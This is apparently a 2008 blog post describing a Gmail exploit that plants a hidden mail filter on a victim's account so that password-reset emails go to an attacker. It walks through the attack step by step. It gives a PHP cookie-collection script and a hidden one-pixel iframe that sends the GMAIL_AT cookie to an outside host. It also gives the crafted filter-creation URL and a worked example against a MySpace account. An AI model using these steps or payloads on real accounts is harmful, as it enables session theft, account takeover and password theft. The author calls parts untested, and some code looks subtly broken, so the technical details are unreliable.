Update: Apparently, the users whom domain were hijacked were hit by phishing attacks instead if using the vulnerability described below. Google deny this vulnerability, and are saying this bug was fixed last year. I was, however, still able to create the filter by forming the URL described when I didn’t sign off correctly. (by clicking the Sign Off link). More testing is needed…

Various reports are describing a new (but somewhat old) exploit used to hijack GoDaddy domains[1]. However, this exploit can be used to retrieve any password from services providers with which the user is registered with his Gmail account.

The basic idea is to create a filter on the victim’s account to redirect e-mails from various services providers to another e-mail account. Then, a malicious individual would use the providers’ “I forgot my password” option to send the password to the victim’s email. Of course that email will be filtered and redirected to the provided email account without the user’s knowledge.

Step 1: Creating the filter

Note: The following are theories about how to retrieve information from the victims’ are only in theory. I have not tested any of the following methods. If you have more information, please share it with the community by leaving a comment.

For that we will need to craft the HTTP address that Google Mail uses to create the filter. This is the core of this exploit: creating the filter without the user’s username and password. However, we still need to retrieve some information from the victim. We will need the Unique Account Identifier (UAID) and the Session Authorization Key[2].

a) Getting the Unique Account Identifier

Getting the UAID is not easy…unless your victim has a website with Google’s AdSense. If that is the case, navigate to their website and look for the source of the page. Locate the AdSense HTML and look for the ‘google_ad_client‘ line:

    <script type="text/javascript"><!--
    google_ad_client = "pub-8479810701377729";
    google_ad_width = 728;
    google_ad_height = 90;
    google_ad_format = "728x90_as";
    google_ad_type = "text";
    google_ad_channel ="9419437988";
    google_color_border = "D699DD";
    google_color_bg = "F5EBF3";
    google_color_link = "E600B1";
    google_color_text = "000000";
    google_color_url = "995AE3";
    //--></script>
    <script type="text/javascript"
    src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
    </script>

The large number you see after the “pub-” is the user’s Unique Account Identifier. But it is in plain form. If you try to use this number in the crafted address, it won’t work. More information is needed to form the “header” format needed.

Now, most users don’t have a website even less AdSense. Another way would be to exploit a small library call libgmailer, which stores the identifier in a cookie in order to resume a session:

define("GM_COOKIE_IK_KEY",        "LIBGMAILER_IdKey");
…
/**
* @return bool Success or not.
* @desc Recover session information.
*/
function getSessionFromBrowser() {
    Debugger::say("Start getting session from browser...");

    if (!$this->use_session) {
        return $this->getCookieFromBrowser();
    }
    // Changed to support IK; by Neerav; 13 July 2005
    // Last modified by Neerav; 14 Aug 2005
    if (isset($_SESSION[GM_COOKIE_KEY])) {
        $this->cookie_str =
         base64_decode($_SESSION[GM_COOKIE_KEY]);

    if (isset($_SESSION['id_key'])) {
        $this->cookie_ik_str = $_SESSION['id_key'];

In that case, it comes to stealing the information from the cookie stored by libgmailer. This is a generic technique and is explained in the second section of this article.

Other ways to get the identifier is to look at libraries/software that interfaces with Gmail. If I had more time, I would gladly look into their source code as this would probably inform us a lot about how they get this key from Gmail. If you have any suggestion, observation or know how to get the Unique Account Identifier, please leave a comment so we can share the information. For those interested in looking, try searching in Google Code or searching with Google Code Search for open source software for Gmail.

b) Getting the Session Authorization Key

This information is contained in the victim’s cookie called GMAIL_AT:

GMAIL_AT=909a71ce538b366d-ffe3455bd0aa

GMAIL_AT Cookie Value in Firefox
GMAIL_AT Cookie Value in Firefox

There are many ways to get that information. Of course if you have direct access to the victim’s computer, just fetch a copy of the cookies which are located at:

Otherwise, the best way to steal cookies is by creating a malicious website or exploiting a forum or any other websites which authorizes iFrames and Javascripts. This part works like any cross-site scripting exploit for stealing cookies. You first need to setup a script that will receive data contained in the cookie. Very simple script:

<?php

    $SAKey = $_GET["cookie"];

    if ($SAKey &amp;&amp; is_writable('keys.txt') {
        $hFile = fopen('keys.txt', 'a');
             if ($hFile) {
                fwrite($hFile, $SAKey + "\n");
                fclose($hFile);
            } else {
                echo "Could not open 'keys.txt' for writing";
                exit;
            }
    } else {
        echo "Specified key is empty or 'keys.txt' in not writable";
        exit;
    }
?>

This script will be saved into a PHP file and put online on a free site that supports PHP. Now we have our cookie saver setup at some address, for example: http://www.angelfire.com/someuser/cookie.php

We will now code the malicious script that we will embed in a webpage. For that we will use a tiny IFRAME that won’t be visible to the user[3].  We will set it so it’s one pixel wide by one pixel high. This IFRAME will point to our cookie saver script, so that when the page will load, a GET request will be made by a JavaScript call:

<IFRAME
    SRC="javascript:window.location=%22 http://www.angelfire.com/someuser/cookie.php?cookie=%22+
document.cookie['GMAIL_AT']"
    HEIGHT="1"
    WIDTH="1"
    FRAMEBORDER="0">
</IFRAME>

This code will change the IFRAME source to point to our cookie saver and will read the value of the GMAIL_AT cookie stored on the user’s computer. If you now look at the ‘keys.txt’ file on your account, you should have a new Session Authorization Key.

Once you have all the information, the only thing left to do it to craft a HTTP address that we will send directly to Google. This address is the URL Google uses to create the filter.

http://mail.google.com/mail/
?ui=2
&ik=<Unique Account Identifier>
&at=<Session Authorization Key>
&view=up
&act=cf
&rt=h
&zx=pjo6fg-k2ljzh
&search=cf
&cf1_from=<Email address to filter>
&cf2_emc=true
&cf2_email=<Email address to send filtered email address>
&cf2_tr=true

Where ik is the variable for the Unique Account Identifier you found on step 1a, at, the variable containing the Session Authorization Key you retrieved in step 1b. The cf1_from variable is the email address you wish to intercept and cf2_email is the address you wish the messages sent to the cf1_from address be redirected to. So once the address is crafted, just past it into your browser and the filter will be created. Example:

http://mail.google.com/mail/?ui=2&ik=99999we6wr&at=kj398jkaee8hf8s58i9siuqm1j&view=up&act=cf&rt=h&zx=pjo6fg-k2ljzh&search=cf&cf1_from=support@provider.com&cf2_emc=true&cf2_email=cyberwarfaremag@attacks.org&cf2_tr=true

Step 2 – Password Hunting Time

Once the filters are in place, the easiest part begins. All you need to do is visit the providers from which you want to steal the passwords and use the “I forgot my password” feature available on most of them. The email sent by the support of this provider will then be redirected to the email you have specified on step 1. You can use social networking sites to try to find which services the users are registered to.

Let’s try it with a MySpace account. Now imagine we already had the Unique Account Identifier (a2j3e44rt56) and the Session Authorization Key (909a71ce538b366d-ffe3455bd0). We want to intercept messages from MySpace (“@message.myspace.com”) and redirected them to our account, so our link will be:

http://mail.google.com/mail/?ui=2&ik=a2j3e44rt56&at=909a71ce538b366d-ffe3455bd0&view=up&act=cf&rt=h&zx=pjo6fg-k2ljzh&search=cf&cf1_from=@message.myspace.com&cf2_emc=true&cf2_email=cyberwarfaremag@fastmail.com&cf2_tr=true

Our filter is now created on the victim’s account:

MySpace Filter created by using the Gmail Exploit
MySpace Filter created by using the Gmail Exploit

Then we will be visit MySpace to get some password:

MySpace "Forgot Password?" Option with the victim's email
MySpace
MySpace Forgotten Password sent to the user
MySpace Forgotten Password sent to the user

And if we look at our emails now, guess what we received !

Received MySpace E-mail in our account, fowarded from Gmail
Received MySpace E-mail in our account in Fastmail, fowarded from Gmail

And nothing can be seen from Gmail except if the user looks to his/her filters. That summarize the Gmail exploit recently resurging in the news.


[1] “Domain hijack fears over Gmail exploit”, John Leyden, The Register, November 24, 2008, http://www.theregister.co.uk/2008/11/24/gmail_exploit/ (accessed on November 24, 2008)

[2] “Gmail Security Flaw Proof of Concept”, GeekCondition, November 23, 2008, http://geekcondition.com/2008/11/23/gmail-security-flaw-proof-of-concept/

[3] “Cookie Stealing for phun and profit”, Athleone, DarkMindz, http://www.darkmindz.com/articles/cookie-stealing-for-phun-and-profit-num364.html (accessed on November 24, 2008)